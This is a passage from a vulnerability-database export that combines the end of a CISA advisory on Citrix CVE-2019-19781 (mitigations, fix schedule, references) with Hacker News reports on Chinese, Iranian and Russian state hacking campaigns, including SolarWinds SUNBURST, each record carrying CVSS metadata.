The tool aids customers with detecting potential IOCs based on known attacks and exploits.[[13]](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n\nSee the National Security Agency\u2019s Cybersecurity Advisory on CVE-2019-19781 for other detection measures.[[14]](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\nCISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781.[[15]](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>) CISA encourages administrators to visit CISA\u2019s [GitHub page](<https://github.com/cisagov/check-cve-2019-19781>) to download and run the tool.\n\n### Mitigations\n\nCISA strongly recommends users and administrators update Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP as soon as possible.\n\nThe fixed builds can be downloaded from Citrix Downloads pages for [Citrix ADC](<https://www.citrix.com/downloads/citrix-adc/>), [Citrix Gateway](<https://www.citrix.com/downloads/citrix-gateway/>), and [Citrix SD-WAN](<https://www.citrix.com/downloads/citrix-sd-wan/>).\n\nUntil the appropriate update is implemented, users and administrators should apply Citrix\u2019s interim mitigation steps for CVE-2019-19781.[[16]](<https://support.citrix.com/article/CTX267679>) Verify the successful application of the above mitigations by using the tool in [CTX269180 \u2013 CVE-2019-19781 \u2013 Verification ToolTest](<https://support.citrix.com/article/CTX269180>). **Note:** these mitigation steps apply to Citrix ADC and SD-WAN WANOP deployments.[[17]](<https://support.citrix.com/article/CTX267027>)\n\nRefer to table 1 for Citrix\u2019s fix schedule.[[18]](<https://support.citrix.com/article/CTX267027>)\n\n**Table 1. 
Fix schedule for Citrix appliances vulnerable to CVE-2019-19781**\n\n**Vulnerable Appliance** | **Firmware Update** | **Release Date** \n---|---|--- \nCitrix ADC and Citrix Gateway version 10.5 | Refresh Build 10.5.70.12 | January 24, 2020 \nCitrix ADC and Citrix Gateway version 11.1 | Refresh Build 11.1.63.15 | January 19, 2020 \nCitrix ADC and Citrix Gateway version 12.0 | Refresh Build 12.0.63.13 | January 19, 2020 \nCitrix ADC and Citrix Gateway version 12.1 | Refresh Build 12.1.55.18 | January 23, 2020 \nCitrix ADC and Citrix Gateway version 13.0 | Refresh Build 13.0.47.24 | January 23, 2020 \nCitrix SD-WAN WANOP Release 10.2.6 | Build 10.2.6b | January 22, 2020 \nCitrix SD-WAN WANOP Release 11.0.3 | Build 11.0.3b | January 22, 2020 \n \nAdministrators should review NSA\u2019s [Citrix Advisory](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>) for other mitigations, such as applying the following defense-in-depth strategy:\n\n\u201cConsider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible Citrix ADC and Citrix Gateway appliances to require user authentication for the VPN before being able to reach these appliances. 
Use of a proprietary SSLVPN/TLSVPN is discouraged.\u201d\n\n### References\n\n[[1] Citrix blog: Citrix releases final fixes for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\n[[2] Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway ](<https://support.citrix.com/article/CTX267027>)\n\n[[3] United Kingdom National Cyber Security Centre (NCSC) Alert: Actors exploiting Citrix products vulnerability ](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[4] CERT/CC Vulnerability Note VU#619785 ](<https://www.kb.cert.org/vuls/id/619785/>)\n\n[[5] CISA Current Activity: Citrix Application Delivery Controller and Citrix Gateway Vulnerability ](<https://www.us-cert.gov/ncas/current-activity/2020/01/08/citrix-application-delivery-controller-and-citrix-gateway>)\n\n[[6] NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway ](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\n[[7] Citrix blog: Citrix provides update on Citrix ADC, Citrix Gateway vulnerability ](<https://www.citrix.com/blogs/2020/01/11/citrix-provides-update-on-citrix-adc-citrix-gateway-vulnerability/>)\n\n[[8] CISA Current Activity: CISA Releases Test for Citrix ADC and Gateway Vulnerability GitHub: CISAgov \u2013 check-cve-2019-19781 ](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)\n\n[[9] Citrix Blog: Vulnerability Update: First permanent fixes available, timeline accelerated ](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n\n[[10] Citrix Blog: Update on CVE-2019-19781: Fixes now available for Citrix SD-WAN 
WANOP](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n\n[[11] Citrix Blog: Citrix and FireEye Mandiant share forensic tool for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n\n[[12] Citrix Blog: Fixes now available for Citrix ADC, Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n\n[[13] Citrix Blog: Citrix and FireEye Mandiant share forensic tool for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n\n[[14] NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway ](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\n[[15] CISA Current Activity: CISA Releases Test for Citrix ADC and Gateway Vulnerability GitHub: CISAgov \u2013 check-cve-2019-19781 ](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)\n\n[[16] Citrix Security Bulletin CTX267679, Mitigation Steps for CVE-2019-19781 ](<https://support.citrix.com/article/CTX267679>)\n\n[[17] Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway ](<https://support.citrix.com/article/CTX267027>)\n\n[[18] Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway ](<https://support.citrix.com/article/CTX267027>)\n\n### Revisions\n\nJanuary 20, 2020: Initial Version|January 23, 2020: Updated with information about Citrix releasing fixes for SD-WAN WANOP appliances and an IOC scanning tool|January 24, 2020: Updated with information about Citrix releasing fixes for Citrix ADC and 
Gateway versions 10.5, 12.1, and 13.0|January 27, 2020: Updated vulnerable versions of ADC and Gateway version 10.5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-21T12:00:00", "type": "ics", "title": "Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-05-21T12:00:00", "id": "AA20-020A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-020a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:40:09", "description": "[](<https://thehackernews.com/images/-S81ZTpL3VW0/X2CFi_g7l0I/AAAAAAAAAww/bXeyXz56F-0V-P2VhHdoO5qJllbhNqfswCLcBGAsYHQ/s728-e100/hacking.jpg>)\n\nThe US Cybersecurity and Infrastructure Security Agency (CISA) issued a [new advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-258a>) on Monday about a wave of cyberattacks carried out by Chinese nation-state actors targeting US government agencies and private entities. 
\n \n\"CISA has observed Chinese [Ministry of State Security]-affiliated cyber threat actors operating from the People's Republic of China using commercially available information sources and open-source exploitation tools to target US Government agency networks,\" the cybersecurity agency said. \n \nOver the past 12 months, the victims were identified through sources such as [Shodan](<https://www.shodan.io/>), the Common Vulnerabilities and Exposure ([CVE](<https://cve.mitre.org/>)) database, and the National Vulnerabilities Database (NVD), exploiting the public release of a vulnerability to pick vulnerable targets and further their motives. \n \nBy compromising legitimate websites and leveraging spear-phishing emails with malicious links pointing to attacker-owned sites in order to gain initial access, the Chinese threat actors have deployed open-source tools such as [Cobalt Strike](<https://www.cobaltstrike.com/>), [China Chopper Web Shell](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>), and [Mimikatz](<https://github.com/gentilkiwi/mimikatz>) credential stealer to extract sensitive information from infected systems. \n \nThat's not all. Taking advantage of the fact that organizations aren't quickly mitigating known software vulnerabilities, the state-sponsored attackers are \"targeting, scanning, and probing\" US government networks for unpatched flaws in F5 Networks Big-IP Traffic Management User Interface ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), Citrix VPN ([CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)), Pulse Secure VPN ([CVE-2019-11510](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)), and Microsoft Exchange Servers ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)) to compromise targets. 
\n \n\"Cyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks,\" the agency said. \"While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals.\" \n \nThis is not the first time Chinese actors have worked on behalf of China's MSS to infiltrate various industries across the US and other countries. \n \nIn July, the US Department of Justice (DoJ) [charged two Chinese nationals](<https://thehackernews.com/2020/07/chinese-hackers-covid19.html>) for their alleged involvement in a decade-long hacking spree spanning high tech manufacturing, industrial engineering, defense, educational, gaming software, and pharmaceutical sectors with an aim to steal trade secrets and confidential business information. \n \nBut it's not just China. Earlier this year, Israeli security firm ClearSky uncovered a cyberespionage campaign dubbed \"[Fox Kitten](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>)\" that targeted government, aviation, oil and gas, and security companies by exploiting unpatched VPN vulnerabilities to penetrate and steal information from target companies, prompting CISA to issue [multiple security alerts](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>) urging businesses to secure their VPN environments. 
\n \nStating that sophisticated cyber threat actors will continue to use open-source resources and tools to single out networks with low-security posture, CISA has recommended organizations to patch [routinely exploited vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>), and \"audit their configuration and patch management programs to ensure they can track and mitigate emerging threats.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T09:14:00", "type": "thn", "title": "CISA: Chinese Hackers Exploiting Unpatched Devices to Target U.S. Agencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902"], "modified": "2020-09-15T09:14:30", "id": "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "href": "https://thehackernews.com/2020/09/chinese-hackers-agencies.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:37", "description": 
"[](<https://thehackernews.com/images/-ZHqaACEm1IE/Xkv7mFYNdVI/AAAAAAAAABQ/u9DIxl0wBik0Tdeo0zYMA5h4Eycz0ntogCLcBGAsYHQ/s728-e100/iranian-apt-hacking-group.jpg>)\n\nA new report published by cybersecurity researchers has unveiled evidence of Iranian state-sponsored hackers targeting dozens of companies and organizations in Israel and around the world over the past three years. \n \nDubbed \"**Fox Kitten**,\" the cyber-espionage campaign is said to have been directed at companies from the IT, telecommunication, oil and gas, aviation, government, and security sectors. \n \n\"We estimate the campaign revealed in this report to be among Iran's most continuous and comprehensive campaigns revealed until now,\" ClearSky [researchers said](<https://www.clearskysec.com/fox-kitten/>). \n \n\"The revealed campaign was used as a reconnaissance infrastructure; however, it can also be used as a platform for spreading and activating destructive malware such as ZeroCleare and Dustman.\" \n \nTying the activities to threat groups APT33, APT34, and APT39, the offensive \u2014 conducted using a mix of open source and self-developed tools \u2014 also facilitated the groups to steal sensitive information and employ supply-chain attacks to target additional organizations, the researchers said. \n \n\n\n## Exploiting VPN Flaws to Compromise Enterprise Networks\n\n \nThe primary attack vector employed by the Iranian groups has been the exploitation of unpatched VPN vulnerabilities to penetrate and steal information from target companies. 
The prominent VPN systems exploited this way included Pulse Secure Connect ([CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>)), Palo Alto Networks' Global Protect ([CVE-2019-1579](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1579>)), Fortinet FortiOS ([CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)), and Citrix ([CVE-2019-19781](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>)). \n \nClearSky noted that the hacking groups were able to successfully acquire access to the targets' core systems, drop additional malware, and laterally spread across the network by exploiting \"1-day vulnerabilities in relatively short periods of time.\" \n \n\n\n[](<https://thehackernews.com/images/-HB88FpLNx7E/Xkv6_Gs13XI/AAAAAAAAABE/sTXpiQuKh4w_qMLsMyuIs2xY7eNJONDHQCLcBGAsYHQ/s728-e100/Iranian-hackers-1.jpg>)\n\n \nUpon successfully gaining an initial foothold, the compromised systems were found to communicate with attacker-controlled command-and-control (C2) servers to download a series of custom VBScript files that can, in turn, be used to plant backdoors. \n \nFurthermore, the backdoor code in itself is downloaded in chunks so as to avoid detection by antivirus software installed on the infected computers. It's the job of a separate downloaded file \u2014 named \"combine.bat\" \u2014 to stitch together these individual files and create an executable. \n \nTo perform these tasks and achieve persistence, the threat actors exploited tools such as [Juicy Potato](<https://github.com/ohpe/juicy-potato>) and [Invoke the Hash](<https://github.com/Kevin-Robertson/Invoke-TheHash>) to gain high-level privileges and laterally move across the network. 
Some of the other tools developed by the attackers include: \n \n\n\n * STSRCheck - A tool for mapping databases, servers, and open ports in the targeted network and brute-forcing them by logging in with default credentials.\n * Port.exe - A tool to scan predefined ports and servers.\n \nOnce the attackers gained lateral movement capabilities, they moved to the final stage: executing the backdoor to scan the compromised system for relevant information and exfiltrating the files back to the attacker by establishing a remote desktop connection (using a self-developed tool called POWSSHNET) or opening a socket-based connection to a hardcoded IP address. \n \n\n\n[](<https://thehackernews.com/images/-I5Tu4KNsPis/Xkv6nXcj6DI/AAAAAAAAAA8/E1cMYGuEIdsjFmfX7dXhnzRwfrgC0_dRACLcBGAsYHQ/s728-e100/Iranian-hackers.jpg>)\n\n \nIn addition, the attackers used [web shells](<https://www.us-cert.gov/ncas/alerts/TA15-314A>) in order to communicate with the servers located inside the target and upload files directly to a C2 server. \n \n\n\n## The Work of Multiple Iranian Hacking Groups\n\n \nBased on the campaign's use of web shells and overlaps with the attack infrastructure, the ClearSky report highlighted that the attacks against VPN servers are possibly linked to three Iranian groups \u2014 APT33 (\"Elfin\"), APT34 (\"OilRig\") and APT39 (Chafer). \n \nWhat's more, the researchers assessed that the campaign is a result of a \"cooperation between the groups in infrastructure,\" citing similarities in the tools and work methods across the three groups. \n \nJust last month, Iranian state-backed hackers \u2014 dubbed \"[Magnallium](<https://www.wired.com/story/iran-apt33-us-electric-grid>)\" \u2014 were discovered carrying out password-spraying attacks targeting US electric utilities as well as oil and gas firms. \n \nGiven that the attackers are weaponizing VPN flaws within 24 hours, it's imperative that organizations install security patches as and when they are available. 
\n \nAside from following the principle of least privilege, it also goes without saying that critical systems are monitored continuously and kept up to date. Implementing two-step authentication can go a long way towards minimizing unauthorized logins.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-02-18T15:06:00", "type": "thn", "title": "Iranian Hackers Exploiting VPN Flaws to Backdoor Organizations Worldwide", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-1579", "CVE-2019-19781"], "modified": "2020-02-18T15:13:08", "id": "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "href": "https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:41", "description": "[](<https://thehackernews.com/images/-Cpd5jYOBXGk/X9b7WId_6xI/AAAAAAAABPY/RSyw2zajv6MRRJNaCspQPEerTW8vEpNpACLcBGAsYHQ/s0/solarwinds.jpg>)\n\nState-sponsored actors allegedly working for Russia have 
[targeted](<https://www.washingtonpost.com/national-security/russian-government-spies-are-behind-a-broad-hacking-campaign-that-has-breached-us-agencies-and-a-top-cyber-firm/2020/12/13/d5a53b88-3d7d-11eb-9453-fc36ba051781_story.html>) the US Treasury, the Commerce Department's National Telecommunications and Information Administration (NTIA), and other government agencies to [monitor internal email traffic](<https://www.reuters.com/article/us-usa-cyber-amazon-com-exclsuive/exclusive-u-s-treasury-breached-by-hackers-backed-by-foreign-government-sources-idUSKBN28N0PG>) as part of a widespread cyberespionage campaign.\n\nThe Washington Post, citing unnamed sources, said the latest attacks were the work of APT29 or Cozy Bear, the same hacking group that's believed to have orchestrated a breach of US-based cybersecurity firm [FireEye](<https://thehackernews.com/2020/12/cybersecurity-firm-fireeye-got-hacked.html>) a few days ago leading to the theft of its Red Team penetration testing tools.\n\nThe motive and the full scope of what intelligence was compromised remains unclear, but signs are that adversaries tampered with a software update released by Texas-based IT infrastructure provider SolarWinds earlier this year to infiltrate the systems of government agencies as well as FireEye and mount a highly-sophisticated [supply chain attack](<https://en.wikipedia.org/wiki/Supply_chain_attack>).\n\n\"The compromise of SolarWinds' Orion Network Management Products poses unacceptable risks to the security of federal networks,\" said Brandon Wales, acting director of the US Cybersecurity and Infrastructure Security Agency (CISA), which has [released](<https://www.cisa.gov/news/2020/12/13/cisa-issues-emergency-directive-mitigate-compromise-solarwinds-orion-network>) an emergency directive, urging federal civilian agencies to review their networks for suspicious activity and disconnect or power down SolarWinds Orion products immediately.\n\nSolarWinds' networking and security 
products are used by more than [300,000 customers worldwide](<https://www.solarwinds.com/company/customers>), including Fortune 500 companies, government agencies, and education institutions.\n\nIt also serves several major US telecommunications companies, all five branches of the US Military, and other prominent government organizations such as the Pentagon, State Department, NASA, National Security Agency (NSA), Postal Service, NOAA, Department of Justice, and the Office of the President of the United States.\n\n### An Evasive Campaign to Distribute SUNBURST Backdoor\n\nFireEye, which is tracking the ongoing intrusion campaign under the moniker \"[UNC2452](<https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html>),\" said the supply chain attack takes advantage of trojanized SolarWinds Orion business software updates in order to distribute a backdoor called SUNBURST.\n\n\"This campaign may have begun as early as Spring 2020 and is currently ongoing,\" FireEye said in a Sunday analysis. \"Post compromise activity following this supply chain compromise has included lateral movement and data theft. 
The campaign is the work of a highly skilled actor and the operation was conducted with significant operational security.\"\n\n[](<https://thehackernews.com/images/-PbITJeTtDpo/X9b7oJ1VO6I/AAAAAAAABPg/V3gShVN1NtYYFwAKCmwfQuhQjkNYMDgQgCLcBGAsYHQ/s0/solarwinds-backdoor.jpg>)\n\nThis rogue version of SolarWinds Orion plug-in, besides masquerading its network traffic as the Orion Improvement Program ([OIP](<https://support.solarwinds.com/SuccessCenter/s/article/Orion-Improvement-Program?language=en_US>)) protocol, is said to communicate via HTTP to remote servers so as to retrieve and execute malicious commands (\"Jobs\") that cover the spyware gamut, including those for transferring files, executing files, profiling and rebooting the target system, and disabling system services.\n\nOrion Improvement Program or OIP is chiefly used to collect performance and usage statistics data from SolarWinds users for product improvement purposes.\n\nWhat's more, the IP addresses used for the campaign were obfuscated by VPN servers located in the same country as the victim to evade detection.\n\nMicrosoft also corroborated the findings in a separate analysis, stating the attack (which it calls \"[Solorigate](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Solorigate.C!dha&ThreatID=2147771132>)\") leveraged the trust associated with SolarWinds software to insert malicious code as part of a larger campaign.\n\n\"A malicious software class was included among many other legitimate classes and then signed with a legitimate certificate,\" the Windows maker said. 
\"The resulting binary included a backdoor and was then discreetly distributed into targeted organizations.\"\n\n### SolarWinds Releases Security Advisory\n\nIn a [security advisory](<https://www.solarwinds.com/securityadvisory>) published by SolarWinds, the company said the attack targets versions 2019.4 through 2020.2.1 of the SolarWinds Orion Platform software that was released between March and June 2020, while recommending that users upgrade to Orion Platform release 2020.2.1 HF 1 immediately.\n\nThe firm, which is currently investigating the attack in coordination with FireEye and the US Federal Bureau of Investigation, is also expected to release an additional hotfix, 2020.2.1 HF 2, on December 15, which replaces the compromised component and provides several extra security enhancements.\n\nFireEye last week disclosed that it fell victim to a highly sophisticated foreign-government attack that compromised its software tools used to test the defenses of its customers.\n\nTotaling as many as [60 in number](<https://www.picussecurity.com/resource/blog/techniques-tactics-procedures-utilized-by-fireeye-red-team-tools>), the stolen Red Team tools are a mix of publicly available tools (43%), modified versions of publicly available tools (17%), and those that were developed in-house (40%).\n\nFurthermore, the theft also includes exploit payloads that leverage critical vulnerabilities in Pulse Secure SSL VPN (CVE-2019-11510), Microsoft Active Directory (CVE-2020-1472), Zoho ManageEngine Desktop Central (CVE-2020-10189), and Windows Remote Desktop Services (CVE-2019-0708).\n\nThe campaign, ultimately, appears to be a supply chain attack on a global scale, for FireEye said it detected this activity across several entities worldwide, spanning government, consulting, technology, telecom, and extractive firms in North America, Europe, Asia, and the Middle East.\n\nThe indicators of compromise (IoCs) and other relevant attack signatures designed to counter SUNBURST can be 
accessed [here](<https://github.com/fireeye/sunburst_countermeasures>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-14T05:44:00", "type": "thn", "title": "US Agencies and FireEye Were Hacked Using SolarWinds Software Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0708", "CVE-2019-11510", "CVE-2020-10189", "CVE-2020-1472"], "modified": "2020-12-14T12:54:22", "id": "THN:E9454DED855ABE5718E4612A2A750A98", "href": "https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:20", "description": "[](<https://thehackernews.com/images/-LTN8ZEVASAQ/YHhnaI6y7gI/AAAAAAAACSI/-4R4GM5jnigOmkENHKFJXtyjjp1f6w4QQCLcBGAsYHQ/s0/us-sanctions-russia-solarwinds-hack.jpg>)\n\nThe U.S. and U.K. 
on Thursday formally attributed the supply chain attack of IT infrastructure management company SolarWinds with \"high confidence\" to government operatives working for Russia's Foreign Intelligence Service (SVR).\n\n\"Russia's pattern of malign behaviour around the world \u2013 whether in cyberspace, in election interference or in the aggressive operations of their intelligence services \u2013 demonstrates that Russia remains the most acute threat to the U.K.'s national and collective security,\" the U.K. government [said](<https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services>) in a statement.\n\nTo that effect, the U.S. Department of the Treasury has imposed sweeping sanctions against Russia for \"undermining the conduct of free and fair elections and democratic institutions\" in the U.S. and for its role in facilitating the sprawling SolarWinds hack, while also barring six technology companies in the country that provide support to the cyber program run by Russian Intelligence Services.\n\n[](<https://thehackernews.com/images/-3aKGKEh2OCw/YHhnxG35qkI/AAAAAAAACSQ/DNi8MHTziNkZeNqP2Y6g9DXrwuwcIBooQCLcBGAsYHQ/s0/russian-hacker.jpg>)\n\nThe companies include ERA Technopolis, Pasit, Federal State Autonomous Scientific Establishment Scientific Research Institute Specialized Security Computing Devices and Automation (SVA), Neobit, Advanced System Technology, and Pozitiv Teknolodzhiz (Positive Technologies), the last three of which are IT security firms whose customers are said to include the Russian Ministry of Defense, SVR, and Russia's Federal Security Service (FSB).\n\n\"As a company, we deny the groundless accusations made by the U.S. Department of the Treasury,\" Positive Technologies [said](<https://www.ptsecurity.com/ww-en/about/news/positive-technologies-official-statement-following-u-s-sanctions/>) in a statement. 
\"In the almost 20 years we have been operating there has been no evidence of the results of Positive Technologies\u2019 research being used in violation of the principles of business transparency and the ethical exchange of information with the professional information security community.\"\n\nIn addition, the Biden administration is also [expelling ten members](<https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20210415>) of Russia's diplomatic mission in Washington, D.C., including representatives of its intelligence services.\n\n\"The scope and scale of this compromise combined with Russia's history of carrying out reckless and disruptive cyber operations makes it a national security concern,\" the Treasury Department [said](<https://home.treasury.gov/news/press-releases/jy0127>). \"The SVR has put at risk the global technology supply chain by allowing malware to be installed on the machines of tens of thousands of SolarWinds' customers.\"\n\nFor its part, Moscow had previously [denied involvement](<https://thehackernews.com/2021/01/fbi-cisa-nsa-officially-blames-russia.html>) in the broad-scope SolarWinds campaign, stating \"it does not conduct offensive operations in the cyber domain.\"\n\nThe [intrusions](<https://thehackernews.com/2021/03/researchers-find-3-new-malware-strains.html>) came to light in December 2020 when FireEye and other cybersecurity firms revealed that the operators behind the espionage campaign managed to compromise the software build and code signing infrastructure of SolarWinds Orion platform as early as October 2019 to deliver the Sunburst backdoor with the goal of gathering sensitive information.\n\nUp to 18,000 SolarWinds customers are believed to have received the trojanized Orion update, although the attackers carefully selected their targets, opting to escalate the attacks only in a handful of cases by deploying Teardrop malware based on an initial reconnaissance of the target environment for high-value 
